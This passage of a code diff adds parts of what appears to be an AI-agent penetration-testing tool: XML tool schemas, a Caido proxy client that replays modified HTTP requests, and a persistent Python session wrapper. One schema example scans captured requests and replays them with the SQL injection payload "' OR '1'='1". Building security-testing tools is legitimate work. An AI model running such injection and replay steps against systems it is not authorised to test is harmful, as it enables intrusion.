        <description>Domain patterns to include. Examples: ["*.example.com", "api.test.com"]</description>
      </parameter>
      <parameter name="denylist" type="list" required="false">
        <description>Patterns to exclude. Some common extensions:
        ["*.gif", "*.jpg", "*.png", "*.css", "*.js", "*.ico", "*.svg", "*woff*", "*.ttf"]</description>
      </parameter>
      <parameter name="scope_id" type="string" required="false">
        <description>Specific scope ID to operate on (required for get, update, delete)</description>
      </parameter>
      <parameter name="scope_name" type="string" required="false">
        <description>Name for scope (required for create, update)</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Depending on action:
        - get: Single scope object or error
        - list: {"scopes": [...], "count": N}
        - create/update: {"scope": {...}, "message": "..."}
        - delete: {"message": "...", "deletedId": "..."}</description>
    </returns>
    <notes>
  - Empty allowlist = allow all domains
  - Denylist overrides allowlist
  - Glob patterns: * (any), ? (single), [abc] (one of), [a-z] (range), [^abc] (none of)
  - Each scope has unique ID and can be used with list_requests(scopeId=...)
    </notes>
    <examples>
  # Create API-only scope
  <function=scope_rules>
  <parameter=action>create</parameter>
  <parameter=scope_name>API Testing</parameter>
  <parameter=allowlist>["api.example.com", "*.api.com"]</parameter>
  <parameter=denylist>["*.gif", "*.jpg", "*.png", "*.css", "*.js"]</parameter>
  </function>
    </examples>
  </tool>
  <tool name="list_sitemap">
    <description>View hierarchical sitemap of discovered attack surface from proxied traffic.
    Perfect for bug hunters to understand the application structure and identify
    interesting endpoints, directories, and entry points discovered during testing.</description>
    <parameters>
      <parameter name="scope_id" type="string" required="false">
        <description>Scope ID to filter sitemap entries (use scope_rules to get/create scope IDs)</description>
      </parameter>
      <parameter name="parent_id" type="string" required="false">
        <description>ID of parent entry to expand. If None, returns root domains.</description>
      </parameter>
      <parameter name="depth" type="string" required="false">
        <description>DIRECT: Only immediate children. ALL: All descendants recursively.</description>
      </parameter>
      <parameter name="page" type="integer" required="false">
        <description>Page number for pagination (30 entries per page)</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing:
        - 'entries': List of cleaned sitemap entries
        - 'page', 'total_pages', 'total_count': Pagination info
        - 'has_more': Whether more pages available
        - Each entry: id, kind, label, hasDescendants, request (method/path/status only)</description>
    </returns>
    <notes>
  Entry kinds:
  - DOMAIN: Root domains (example.com)
  - DIRECTORY: Path directories (/api/, /admin/)
  - REQUEST: Individual endpoints
  - REQUEST_BODY: POST/PUT body variations
  - REQUEST_QUERY: GET parameter variations
  Check hasDescendants=true to identify entries worth expanding.
  Use parent_id from any entry to drill down into subdirectories.
    </notes>
  </tool>
  <tool name="view_sitemap_entry">
    <description>Get detailed information about a specific sitemap entry and related requests.
    Perfect for understanding what's been discovered under a specific directory
    or endpoint, including all related requests and response codes.</description>
    <parameters>
      <parameter name="entry_id" type="string" required="true">
        <description>ID of the sitemap entry to examine</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing:
        - 'entry': Complete entry details including metadata
        - Entry contains 'requests' with all related HTTP requests
        - Shows request methods, paths, response codes, timing</description>
    </returns>
  </tool>
 </tools>
--- a/strix/tools/proxy/proxy_manager.py
+++ b/strix/tools/proxy/proxy_manager.py
@@ -0,0 +1,785 @@
 import base64
 import os
 import re
 import time
 from typing import TYPE_CHECKING, Any
 from urllib.parse import parse_qs, urlencode, urlparse, urlunparse
 import requests
 from gql import Client, gql
 from gql.transport.exceptions import TransportQueryError
 from gql.transport.requests import RequestsHTTPTransport
 from requests.exceptions import ProxyError, RequestException, Timeout
 if TYPE_CHECKING:
    from collections.abc import Callable
 class ProxyManager:
    def __init__(self, auth_token: str | None = None):
        host = "127.0.0.1"
        port = os.getenv("CAIDO_PORT", "56789")
        self.base_url = f"http://{host}:{port}/graphql"
        self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
        self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
        self.transport = RequestsHTTPTransport(
            url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
        )
        self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
    def list_requests(
        self,
        httpql_filter: str | None = None,
        start_page: int = 1,
        end_page: int = 1,
        page_size: int = 50,
        sort_by: str = "timestamp",
        sort_order: str = "desc",
        scope_id: str | None = None,
    ) -> dict[str, Any]:
        offset = (start_page - 1) * page_size
        limit = (end_page - start_page + 1) * page_size
        sort_mapping = {
            "timestamp": "CREATED_AT",
            "host": "HOST",
            "method": "METHOD",
            "path": "PATH",
            "status_code": "RESP_STATUS_CODE",
            "response_time": "RESP_ROUNDTRIP_TIME",
            "response_size": "RESP_LENGTH",
            "source": "SOURCE",
        }
        query = gql("""
            query GetRequests(
                $limit: Int, $offset: Int, $filter: HTTPQL,
                $order: RequestResponseOrderInput, $scopeId: ID
            ) {
                requestsByOffset(
                    limit: $limit, offset: $offset, filter: $filter,
                    order: $order, scopeId: $scopeId
                ) {
                    edges {
                        node {
                            id method host path query createdAt length isTls port
                            source alteration fileExtension
                            response { id statusCode length roundtripTime createdAt }
                        }
                    }
                    count { value }
                }
            }
        """)
        variables = {
            "limit": limit,
            "offset": offset,
            "filter": httpql_filter,
            "order": {
                "by": sort_mapping.get(sort_by, "CREATED_AT"),
                "ordering": sort_order.upper(),
            },
            "scopeId": scope_id,
        }
        try:
            result = self.client.execute(query, variable_values=variables)
            data = result.get("requestsByOffset", {})
            nodes = [edge["node"] for edge in data.get("edges", [])]
            count_data = data.get("count") or {}
            return {
                "requests": nodes,
                "total_count": count_data.get("value", 0),
                "start_page": start_page,
                "end_page": end_page,
                "page_size": page_size,
                "offset": offset,
                "returned_count": len(nodes),
                "sort_by": sort_by,
                "sort_order": sort_order,
            }
        except (TransportQueryError, ValueError, KeyError) as e:
            return {"requests": [], "total_count": 0, "error": f"Error fetching requests: {e}"}
    def view_request(
        self,
        request_id: str,
        part: str = "request",
        search_pattern: str | None = None,
        page: int = 1,
        page_size: int = 50,
    ) -> dict[str, Any]:
        queries = {
            "request": """query GetRequest($id: ID!) {
                request(id: $id) {
                    id method host path query createdAt length isTls port
                    source alteration edited raw
                }
            }""",
            "response": """query GetRequest($id: ID!) {
                request(id: $id) {
                    id response {
                        id statusCode length roundtripTime createdAt raw
                    }
                }
            }""",
        }
        if part not in queries:
            return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
        try:
            result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
            request_data = result.get("request", {})
            if not request_data:
                return {"error": f"Request {request_id} not found"}
            if part == "request":
                raw_content = request_data.get("raw")
            else:
                response_data = request_data.get("response") or {}
                raw_content = response_data.get("raw")
            if not raw_content:
                return {"error": "No content available"}
            content = base64.b64decode(raw_content).decode("utf-8", errors="replace")
            if part == "response":
                request_data["response"]["raw"] = content
            else:
                request_data["raw"] = content
            return (
                self._search_content(request_data, content, search_pattern)
                if search_pattern
                else self._paginate_content(request_data, content, page, page_size)
            )
        except (TransportQueryError, ValueError, KeyError, UnicodeDecodeError) as e:
            return {"error": f"Failed to view request: {e}"}
    def _search_content(
        self, request_data: dict[str, Any], content: str, pattern: str
    ) -> dict[str, Any]:
        try:
            regex = re.compile(pattern, re.IGNORECASE | re.MULTILINE | re.DOTALL)
            matches = []
            for match in regex.finditer(content):
                start, end = match.start(), match.end()
                context_size = 120
                before = re.sub(r"\s+", " ", content[max(0, start - context_size) : start].strip())[
                    -100:
                ]
                after = re.sub(r"\s+", " ", content[end : end + context_size].strip())[:100]
                matches.append(
                    {"match": match.group(), "before": before, "after": after, "position": start}
                )
                if len(matches) >= 20:
                    break
            return {
                "id": request_data.get("id"),
                "matches": matches,
                "total_matches": len(matches),
                "search_pattern": pattern,
                "truncated": len(matches) >= 20,
            }
        except re.error as e:
            return {"error": f"Invalid regex: {e}"}
    def _paginate_content(
        self, request_data: dict[str, Any], content: str, page: int, page_size: int
    ) -> dict[str, Any]:
        display_lines = []
        for line in content.split("\n"):
            if len(line) <= 80:
                display_lines.append(line)
            else:
                display_lines.extend(
                    [
                        line[i : i + 80] + (" \\" if i + 80 < len(line) else "")
                        for i in range(0, len(line), 80)
                    ]
                )
        total_lines = len(display_lines)
        total_pages = (total_lines + page_size - 1) // page_size
        page = max(1, min(page, total_pages))
        start_line = (page - 1) * page_size
        end_line = min(total_lines, start_line + page_size)
        return {
            "id": request_data.get("id"),
            "content": "\n".join(display_lines[start_line:end_line]),
            "page": page,
            "total_pages": total_pages,
            "showing_lines": f"{start_line + 1}-{end_line} of {total_lines}",
            "has_more": page < total_pages,
        }
    def send_simple_request(
        self,
        method: str,
        url: str,
        headers: dict[str, str] | None = None,
        body: str = "",
        timeout: int = 30,
    ) -> dict[str, Any]:
        if headers is None:
            headers = {}
        try:
            start_time = time.time()
            response = requests.request(
                method=method,
                url=url,
                headers=headers,
                data=body or None,
                proxies=self.proxies,
                timeout=timeout,
                verify=False,
            )
            response_time = int((time.time() - start_time) * 1000)
            body_content = response.text
            if len(body_content) > 10000:
                body_content = body_content[:10000] + "\n... [truncated]"
            return {
                "status_code": response.status_code,
                "headers": dict(response.headers),
                "body": body_content,
                "response_time_ms": response_time,
                "url": response.url,
                "message": (
                    "Request sent through proxy - check list_requests() for captured traffic"
                ),
            }
        except (RequestException, ProxyError, Timeout) as e:
            return {"error": f"Request failed: {type(e).__name__}", "details": str(e), "url": url}
    def repeat_request(
        self, request_id: str, modifications: dict[str, Any] | None = None
    ) -> dict[str, Any]:
        if modifications is None:
            modifications = {}
        original = self.view_request(request_id, "request")
        if "error" in original:
            return {"error": f"Could not retrieve original request: {original['error']}"}
        raw_content = original.get("content", "")
        if not raw_content:
            return {"error": "No raw request content found"}
        request_components = self._parse_http_request(raw_content)
        if "error" in request_components:
            return request_components
        full_url = self._build_full_url(request_components, modifications)
        if "error" in full_url:
            return full_url
        modified_request = self._apply_modifications(
            request_components, modifications, full_url["url"]
        )
        return self._send_modified_request(modified_request, request_id, modifications)
    def _parse_http_request(self, raw_content: str) -> dict[str, Any]:
        lines = raw_content.split("\n")
        request_line = lines[0].strip().split(" ")
        if len(request_line) < 2:
            return {"error": "Invalid request line format"}
        method, url_path = request_line[0], request_line[1]
        headers = {}
        body_start = 0
        for i, line in enumerate(lines[1:], 1):
            if line.strip() == "":
                body_start = i + 1
                break
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip()] = value.strip()
        body = "\n".join(lines[body_start:]).strip() if body_start < len(lines) else ""
        return {"method": method, "url_path": url_path, "headers": headers, "body": body}
    def _build_full_url(
        self, components: dict[str, Any], modifications: dict[str, Any]
    ) -> dict[str, Any]:
        headers = components["headers"]
        host = headers.get("Host", "")
        if not host:
            return {"error": "No Host header found"}
        protocol = (
            "https" if ":443" in host or "https" in headers.get("Referer", "").lower() else "http"
        )
        full_url = f"{protocol}://{host}{components['url_path']}"
        if "url" in modifications:
            full_url = modifications["url"]
        return {"url": full_url}
    def _apply_modifications(
        self, components: dict[str, Any], modifications: dict[str, Any], full_url: str
    ) -> dict[str, Any]:
        headers = components["headers"].copy()
        body = components["body"]
        final_url = full_url
        if "params" in modifications:
            parsed = urlparse(final_url)
            params = {k: v[0] if v else "" for k, v in parse_qs(parsed.query).items()}
            params.update(modifications["params"])
            final_url = urlunparse(parsed._replace(query=urlencode(params)))
        if "headers" in modifications:
            headers.update(modifications["headers"])
        if "body" in modifications:
            body = modifications["body"]
        if "cookies" in modifications:
            cookies = {}
            if headers.get("Cookie"):
                for cookie in headers["Cookie"].split(";"):
                    if "=" in cookie:
                        k, v = cookie.split("=", 1)
                        cookies[k.strip()] = v.strip()
            cookies.update(modifications["cookies"])
            headers["Cookie"] = "; ".join([f"{k}={v}" for k, v in cookies.items()])
        return {
            "method": components["method"],
            "url": final_url,
            "headers": headers,
            "body": body,
        }
    def _send_modified_request(
        self, request_data: dict[str, Any], request_id: str, modifications: dict[str, Any]
    ) -> dict[str, Any]:
        try:
            start_time = time.time()
            response = requests.request(
                method=request_data["method"],
                url=request_data["url"],
                headers=request_data["headers"],
                data=request_data["body"] or None,
                proxies=self.proxies,
                timeout=30,
                verify=False,
            )
            response_time = int((time.time() - start_time) * 1000)
            response_body = response.text
            truncated = len(response_body) > 10000
            if truncated:
                response_body = response_body[:10000] + "\n... [truncated]"
            return {
                "status_code": response.status_code,
                "status_text": response.reason,
                "headers": {
                    k: v
                    for k, v in response.headers.items()
                    if k.lower()
                    in ["content-type", "content-length", "server", "set-cookie", "location"]
                },
                "body": response_body,
                "body_truncated": truncated,
                "body_size": len(response.content),
                "response_time_ms": response_time,
                "url": response.url,
                "original_request_id": request_id,
                "modifications_applied": modifications,
                "request": {
                    "method": request_data["method"],
                    "url": request_data["url"],
                    "headers": request_data["headers"],
                    "has_body": bool(request_data["body"]),
                },
            }
        except ProxyError as e:
            return {
                "error": "Proxy connection failed - is Caido running?",
                "details": str(e),
                "original_request_id": request_id,
            }
        except (RequestException, Timeout) as e:
            return {
                "error": f"Failed to repeat request: {type(e).__name__}",
                "details": str(e),
                "original_request_id": request_id,
            }
    def _handle_scope_list(self) -> dict[str, Any]:
        result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
        scopes = result.get("scopes", [])
        return {"scopes": scopes, "count": len(scopes)}
    def _handle_scope_get(self, scope_id: str | None) -> dict[str, Any]:
        if not scope_id:
            return self._handle_scope_list()
        result = self.client.execute(
            gql(
                "query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
            ),
            variable_values={"id": scope_id},
        )
        scope = result.get("scope")
        if not scope:
            return {"error": f"Scope {scope_id} not found"}
        return {"scope": scope}
    def _handle_scope_create(
        self, scope_name: str, allowlist: list[str] | None, denylist: list[str] | None
    ) -> dict[str, Any]:
        if not scope_name:
            return {"error": "scope_name required for create"}
        mutation = gql("""
            mutation CreateScope($input: CreateScopeInput!) {
                createScope(input: $input) {
                    scope { id name allowlist denylist indexed }
                    error {
                        ... on InvalidGlobTermsUserError { code terms }
                        ... on OtherUserError { code }
                    }
                }
            }
        """)
        result = self.client.execute(
            mutation,
            variable_values={
                "input": {
                    "name": scope_name,
                    "allowlist": allowlist or [],
                    "denylist": denylist or [],
                }
            },
        )
        payload = result.get("createScope", {})
        if payload.get("error"):
            error = payload["error"]
            return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
        return {"scope": payload.get("scope"), "message": "Scope created successfully"}
    def _handle_scope_update(
        self,
        scope_id: str,
        scope_name: str,
        allowlist: list[str] | None,
        denylist: list[str] | None,
    ) -> dict[str, Any]:
        if not scope_id or not scope_name:
            return {"error": "scope_id and scope_name required"}
        mutation = gql("""
            mutation UpdateScope($id: ID!, $input: UpdateScopeInput!) {
                updateScope(id: $id, input: $input) {
                    scope { id name allowlist denylist indexed }
                    error {
                        ... on InvalidGlobTermsUserError { code terms }
                        ... on OtherUserError { code }
                    }
                }
            }
        """)
        result = self.client.execute(
            mutation,
            variable_values={
                "id": scope_id,
                "input": {
                    "name": scope_name,
                    "allowlist": allowlist or [],
                    "denylist": denylist or [],
                },
            },
        )
        payload = result.get("updateScope", {})
        if payload.get("error"):
            error = payload["error"]
            return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
        return {"scope": payload.get("scope"), "message": "Scope updated successfully"}
    def _handle_scope_delete(self, scope_id: str) -> dict[str, Any]:
        if not scope_id:
            return {"error": "scope_id required for delete"}
        result = self.client.execute(
            gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
            variable_values={"id": scope_id},
        )
        payload = result.get("deleteScope", {})
        if not payload.get("deletedId"):
            return {"error": f"Failed to delete scope {scope_id}"}
        return {"message": f"Scope {scope_id} deleted", "deletedId": payload["deletedId"]}
    def scope_rules(
        self,
        action: str,
        allowlist: list[str] | None = None,
        denylist: list[str] | None = None,
        scope_id: str | None = None,
        scope_name: str | None = None,
    ) -> dict[str, Any]:
        handlers: dict[str, Callable[[], dict[str, Any]]] = {
            "list": self._handle_scope_list,
            "get": lambda: self._handle_scope_get(scope_id),
            "create": lambda: (
                {"error": "scope_name required for create"}
                if not scope_name
                else self._handle_scope_create(scope_name, allowlist, denylist)
            ),
            "update": lambda: (
                {"error": "scope_id and scope_name required"}
                if not scope_id or not scope_name
                else self._handle_scope_update(scope_id, scope_name, allowlist, denylist)
            ),
            "delete": lambda: (
                {"error": "scope_id required for delete"}
                if not scope_id
                else self._handle_scope_delete(scope_id)
            ),
        }
        handler = handlers.get(action)
        if not handler:
            return {
                "error": f"Unsupported action: {action}. Use 'get', 'list', 'create', "
                f"'update', or 'delete'"
            }
        try:
            result = handler()
        except (TransportQueryError, ValueError, KeyError) as e:
            return {"error": f"Scope operation failed: {e}"}
        else:
            return result
    def list_sitemap(
        self,
        scope_id: str | None = None,
        parent_id: str | None = None,
        depth: str = "DIRECT",
        page: int = 1,
        page_size: int = 30,
    ) -> dict[str, Any]:
        try:
            skip_count = (page - 1) * page_size
            if parent_id:
                query = gql("""
                    query GetSitemapDescendants($parentId: ID!, $depth: SitemapDescendantsDepth!) {
                        sitemapDescendantEntries(parentId: $parentId, depth: $depth) {
                            edges {
                                node {
                                    id kind label hasDescendants
                                    request { method path response { statusCode } }
                                }
                            }
                            count { value }
                        }
                    }
                """)
                result = self.client.execute(
                    query, variable_values={"parentId": parent_id, "depth": depth}
                )
                data = result.get("sitemapDescendantEntries", {})
            else:
                query = gql("""
                    query GetSitemapRoots($scopeId: ID) {
                        sitemapRootEntries(scopeId: $scopeId) {
                            edges { node {
                                id kind label hasDescendants
                                metadata { ... on SitemapEntryMetadataDomain { isTls port } }
                                request { method path response { statusCode } }
                            } }
                            count { value }
                        }
                    }
                """)
                result = self.client.execute(query, variable_values={"scopeId": scope_id})
                data = result.get("sitemapRootEntries", {})
            all_nodes = [edge["node"] for edge in data.get("edges", [])]
            count_data = data.get("count") or {}
            total_count = count_data.get("value", 0)
            paginated_nodes = all_nodes[skip_count : skip_count + page_size]
            cleaned_nodes = []
            for node in paginated_nodes:
                cleaned = {
                    "id": node["id"],
                    "kind": node["kind"],
                    "label": node["label"],
                    "hasDescendants": node["hasDescendants"],
                }
                if node.get("metadata") and (
                    node["metadata"].get("isTls") is not None or node["metadata"].get("port")
                ):
                    cleaned["metadata"] = node["metadata"]
                if node.get("request"):
                    req = node["request"]
                    cleaned_req = {}
                    if req.get("method"):
                        cleaned_req["method"] = req["method"]
                    if req.get("path"):
                        cleaned_req["path"] = req["path"]
                    response_data = req.get("response") or {}
                    if response_data.get("statusCode"):
                        cleaned_req["status"] = response_data["statusCode"]
                    if cleaned_req:
                        cleaned["request"] = cleaned_req
                cleaned_nodes.append(cleaned)
            total_pages = (total_count + page_size - 1) // page_size
            return {
                "entries": cleaned_nodes,
                "page": page,
                "page_size": page_size,
                "total_pages": total_pages,
                "total_count": total_count,
                "has_more": page < total_pages,
                "showing": (
                    f"{skip_count + 1}-{min(skip_count + page_size, total_count)} of {total_count}"
                ),
            }
        except (TransportQueryError, ValueError, KeyError) as e:
            return {"error": f"Failed to fetch sitemap: {e}"}
    def _process_sitemap_metadata(self, node: dict[str, Any]) -> dict[str, Any]:
        cleaned = {
            "id": node["id"],
            "kind": node["kind"],
            "label": node["label"],
            "hasDescendants": node["hasDescendants"],
        }
        if node.get("metadata") and (
            node["metadata"].get("isTls") is not None or node["metadata"].get("port")
        ):
            cleaned["metadata"] = node["metadata"]
        return cleaned
    def _process_sitemap_request(self, req: dict[str, Any]) -> dict[str, Any] | None:
        cleaned_req = {}
        if req.get("method"):
            cleaned_req["method"] = req["method"]
        if req.get("path"):
            cleaned_req["path"] = req["path"]
        response_data = req.get("response") or {}
        if response_data.get("statusCode"):
            cleaned_req["status"] = response_data["statusCode"]
        return cleaned_req if cleaned_req else None
    def _process_sitemap_response(self, resp: dict[str, Any]) -> dict[str, Any]:
        cleaned_resp = {}
        if resp.get("statusCode"):
            cleaned_resp["status"] = resp["statusCode"]
        if resp.get("length"):
            cleaned_resp["size"] = resp["length"]
        if resp.get("roundtripTime"):
            cleaned_resp["time_ms"] = resp["roundtripTime"]
        return cleaned_resp
    def view_sitemap_entry(self, entry_id: str) -> dict[str, Any]:
        try:
            query = gql("""
                query GetSitemapEntry($id: ID!) {
                    sitemapEntry(id: $id) {
                        id kind label hasDescendants
                        metadata { ... on SitemapEntryMetadataDomain { isTls port } }
                        request { method path response { statusCode length roundtripTime } }
                        requests(first: 30, order: {by: CREATED_AT, ordering: DESC}) {
                            edges { node { method path response { statusCode length } } }
                            count { value }
                        }
                    }
                }
            """)
            result = self.client.execute(query, variable_values={"id": entry_id})
            entry = result.get("sitemapEntry")
            if not entry:
                return {"error": f"Sitemap entry {entry_id} not found"}
            cleaned = self._process_sitemap_metadata(entry)
            if entry.get("request"):
                req = entry["request"]
                cleaned_req = {}
                if req.get("method"):
                    cleaned_req["method"] = req["method"]
                if req.get("path"):
                    cleaned_req["path"] = req["path"]
                if req.get("response"):
                    cleaned_req["response"] = self._process_sitemap_response(req["response"])
                if cleaned_req:
                    cleaned["request"] = cleaned_req
            requests_data = entry.get("requests", {})
            request_nodes = [edge["node"] for edge in requests_data.get("edges", [])]
            cleaned_requests = [
                req
                for req in (self._process_sitemap_request(node) for node in request_nodes)
                if req is not None
            ]
            count_data = requests_data.get("count") or {}
            cleaned["related_requests"] = {
                "requests": cleaned_requests,
                "total_count": count_data.get("value", 0),
                "showing": f"Latest {len(cleaned_requests)} requests",
            }
            return {"entry": cleaned} if cleaned else {"error": "Failed to process sitemap entry"}  # noqa: TRY300
        except (TransportQueryError, ValueError, KeyError) as e:
            return {"error": f"Failed to fetch sitemap entry: {e}"}
    def close(self) -> None:
        pass
 _PROXY_MANAGER: ProxyManager | None = None
 def get_proxy_manager() -> ProxyManager:
    if _PROXY_MANAGER is None:
        return ProxyManager()
    return _PROXY_MANAGER
--- a/strix/tools/python/init.py
+++ b/strix/tools/python/init.py
@@ -0,0 +1,4 @@
 from .python_actions import python_action
 __all__ = ["python_action"]
--- a/strix/tools/python/python_actions.py
+++ b/strix/tools/python/python_actions.py
@@ -0,0 +1,47 @@
 from typing import Any, Literal
 from strix.tools.registry import register_tool
 from .python_manager import get_python_session_manager
 PythonAction = Literal["new_session", "execute", "close", "list_sessions"]
@register_tool
 def python_action(
    action: PythonAction,
    code: str | None = None,
    timeout: int = 30,
    session_id: str | None = None,
 ) -> dict[str, Any]:
    def _validate_code(action_name: str, code: str | None) -> None:
        if not code:
            raise ValueError(f"code parameter is required for {action_name} action")
    def _validate_action(action_name: str) -> None:
        raise ValueError(f"Unknown action: {action_name}")
    manager = get_python_session_manager()
    try:
        match action:
            case "new_session":
                return manager.create_session(session_id, code, timeout)
            case "execute":
                _validate_code(action, code)
                assert code is not None
                return manager.execute_code(session_id, code, timeout)
            case "close":
                return manager.close_session(session_id)
            case "list_sessions":
                return manager.list_sessions()
            case _:
                _validate_action(action)  # type: ignore[unreachable]
    except (ValueError, RuntimeError) as e:
        return {"stderr": str(e), "session_id": session_id, "stdout": "", "is_running": False}
--- a/strix/tools/python/python_actions_schema.xml
+++ b/strix/tools/python/python_actions_schema.xml
@@ -0,0 +1,131 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <tools>
  <tool name="python_action">
    <description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
    <details>Common Use Cases:
      - Security script development and testing (payload generation, exploit scripts)
      - Data analysis of security logs, network traffic, or vulnerability scans
      - Cryptographic operations and security tool automation
      - Interactive penetration testing workflows and proof-of-concept development
      - Processing security data formats (JSON, XML, CSV from security tools)
      - HTTP proxy interaction for web security testing (all proxy functions are pre-imported)
      Each session instance is PERSISTENT and maintains its own global and local namespaces
      until explicitly closed, allowing for multi-step security workflows and stateful computations.
      PROXY FUNCTIONS PRE-IMPORTED:
      All proxy action functions are automatically imported into every Python session, enabling
      seamless HTTP traffic analysis and web security testing
      This is particularly useful for:
      - Analyzing captured HTTP traffic during web application testing
      - Automating request manipulation and replay attacks
      - Building custom security testing workflows combining proxy data with Python analysis
      - Correlating multiple requests for advanced attack scenarios</details>
    <parameters>
      <parameter name="action" type="string" required="true">
        <description>The Python action to perform:     - new_session: Create a new Python interpreter session. This MUST be the first       action for each session.     - execute: Execute Python code in the specified session.     - close: Close the specified session instance.     - list_sessions: List all active Python sessions.</description>
      </parameter>
      <parameter name="code" type="string" required="false">
        <description>Required for 'new_session' (as initial code) and 'execute' actions. The Python code to execute.</description>
      </parameter>
      <parameter name="timeout" type="integer" required="false">
        <description>Maximum execution time in seconds for code execution. Applies to both 'new_session' (when initial code is provided) and 'execute' actions. Default is 30 seconds.</description>
      </parameter>
      <parameter name="session_id" type="string" required="false">
        <description>Unique identifier for the Python session. If not provided, uses the default session ID.</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - session_id: the ID of the session that was operated on - stdout: captured standard output from code execution (for execute action) - stderr: any error message if execution failed - result: string representation of the last expression result - execution_time: time taken to execute the code - message: status message about the action performed - Various session info depending on the action</description>
    </returns>
    <notes>
  Important usage rules:
      1. PERSISTENCE: Session instances remain active and maintain their state (variables,
         imports, function definitions) until explicitly closed with the 'close' action.
         This allows for multi-step workflows across multiple tool calls.
      2. MULTIPLE SESSIONS: You can run multiple Python sessions concurrently by using
         different session_id values. Each session operates independently with its own
         namespace.
      3. Session interaction MUST begin with 'new_session' action for each session instance.
      4. Only one action can be performed per call.
      5. CODE EXECUTION:
         - Both expressions and statements are supported
         - Expressions automatically return their result
         - Print statements and stdout are captured
         - Variables persist between executions in the same session
         - Imports, function definitions, etc. persist in the session
         - IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
         - Line magics (%) and cell magics (%%) work as expected
      6. CLOSE: Terminates the session completely and frees memory
      7. The Python sessions can operate concurrently with other tools. You may invoke
         terminal, browser, or other tools while maintaining active Python sessions.
      8. Each session has its own isolated namespace - variables in one session don't
         affect others.
    </notes>
    <examples>
  # Create new session for security analysis (default session)
      <function=python_action>
      <parameter=action>new_session</parameter>
      <parameter=code>import hashlib
      import base64
      import json
      print("Security analysis session started")</parameter>
      </function>
      # Analyze security data in the default session
      <function=python_action>
      <parameter=action>execute</parameter>
      <parameter=code>vulnerability_data = {"cve": "CVE-2024-1234", "severity": "high"}
      encoded_payload = base64.b64encode(json.dumps(vulnerability_data).encode())
      print(f"Encoded: {encoded_payload.decode()}")</parameter>
      </function>
      # Long running security scan with custom timeout
      <function=python_action>
      <parameter=action>execute</parameter>
      <parameter=code>import time
      # Simulate long-running vulnerability scan
      time.sleep(45)
      print('Security scan completed!')</parameter>
      <parameter=timeout>50</parameter>
      </function>
      # Use IPython magic commands for package management and profiling
      <function=python_action>
      <parameter=action>execute</parameter>
      <parameter=code>%pip install requests
      %time response = requests.get('https://httpbin.org/json')
      %whos</parameter>
      # Analyze requests for potential vulnerabilities
      <function=python_action>
      <parameter=action>execute</parameter>
      <parameter=code># Filter for POST requests that might contain sensitive data
      post_requests = list_requests(
          httpql_filter="req.method.eq:POST",
          page_size=20
      )
      # Analyze each POST request for potential issues
      for req in post_requests.get('requests', []):
          request_id = req['id']
          # View the request details
          request_details = view_request(request_id, part="request")
          # Check for potential SQL injection points
          body = request_details.get('body', '')
          if any(keyword in body.lower() for keyword in ['select', 'union', 'insert', 'update']):
              print(f"Potential SQL injection in request {request_id}")
              # Repeat the request with a test payload
              test_payload = repeat_request(request_id, {
                  'body': body + "' OR '1'='1"
              })
              print(f"Test response status: {test_payload.get('status_code')}")
              print("Security analysis complete!")</parameter>
        </function>
      </examples>
  </tool>
 </tools>
--- a/strix/tools/python/python_instance.py
+++ b/strix/tools/python/python_instance.py
@@ -0,0 +1,172 @@
 import io
 import signal
 import sys
 import threading
 from typing import Any
 from IPython.core.interactiveshell import InteractiveShell
 MAX_STDOUT_LENGTH = 10_000
 MAX_STDERR_LENGTH = 5_000
 class PythonInstance:
    def __init__(self, session_id: str) -> None:
        self.session_id = session_id
        self.is_running = True
        self._execution_lock = threading.Lock()
        import os
        os.chdir("/workspace")
        self.shell = InteractiveShell()
        self.shell.init_completer()
        self.shell.init_history()
        self.shell.init_logger()
        self._setup_proxy_functions()
    def _setup_proxy_functions(self) -> None:
        try:
            from strix.tools.proxy import proxy_actions
            proxy_functions = [
                "list_requests",
                "list_sitemap",
                "repeat_request",
                "scope_rules",
                "send_request",
                "view_request",
                "view_sitemap_entry",
            ]
            proxy_dict = {name: getattr(proxy_actions, name) for name in proxy_functions}
            self.shell.user_ns.update(proxy_dict)
        except ImportError:
            pass
    def _validate_session(self) -> dict[str, Any] | None:
        if not self.is_running:
            return {
                "session_id": self.session_id,
                "stdout": "",
                "stderr": "Session is not running",
                "result": None,
            }
        return None
    def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
        stdout_capture = io.StringIO()
        stderr_capture = io.StringIO()
        def timeout_handler(signum: int, frame: Any) -> None:
            raise TimeoutError(f"Code execution timed out after {timeout} seconds")
        old_handler = signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(timeout)
        sys.stdout = stdout_capture
        sys.stderr = stderr_capture
        return old_handler, stdout_capture, stderr_capture
    def _cleanup_execution_environment(
        self, old_handler: Any, old_stdout: Any, old_stderr: Any
    ) -> None:
        signal.signal(signal.SIGALRM, old_handler)
        sys.stdout = old_stdout
        sys.stderr = old_stderr
    def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
        if len(content) > max_length:
            return content[:max_length] + suffix
        return content
    def _format_execution_result(
        self, execution_result: Any, stdout_content: str, stderr_content: str
    ) -> dict[str, Any]:
        stdout = self._truncate_output(
            stdout_content, MAX_STDOUT_LENGTH, "... [stdout truncated at 10k chars]"
        )
        if execution_result.result is not None:
            if stdout and not stdout.endswith("\n"):
                stdout += "\n"
